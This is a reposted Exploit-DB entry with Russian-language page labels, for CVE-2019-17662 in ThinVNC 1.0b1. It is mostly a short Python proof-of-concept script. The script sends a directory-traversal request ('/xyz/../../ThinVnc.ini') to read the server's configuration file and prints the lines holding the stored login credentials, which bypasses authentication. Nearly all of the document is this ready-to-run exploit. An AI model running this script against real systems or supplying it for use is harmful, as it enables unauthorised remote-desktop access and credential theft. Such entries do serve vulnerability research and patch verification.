- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 47519
- Проверка EDB
-
- Пройдено
- Автор
- NIKHITH TUMAMLAPALLI
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2019-17662
- Дата публикации
- 2019-10-17
ThinVNC 1.0b1 - Authentication Bypass
Код:
# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
# Date: 2019-10-17
# Exploit Author: Nikhith Tumamlapalli
# Contributor WarMarX
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
# Version: 1.0b1
# Tested on: Windows All Platforms
# CVE : CVE-2019-17662
# Description:
# Authentication Bypass via Arbitrary File Read
#!/usr/bin/python3
import sys
import os
import requests
def exploit(host,port):
url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
r = requests.get(url)
body = r.text
print(body.splitlines()[2])
print(body.splitlines()[3])
def main():
if(len(sys.argv)!=3):
print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
print("Example:\n{} 192.168.0.10 5888")
else:
port = sys.argv[2]
host = sys.argv[1]
exploit(host,port)
if __name__ == '__main__':
main()
- Источник
- www.exploit-db.com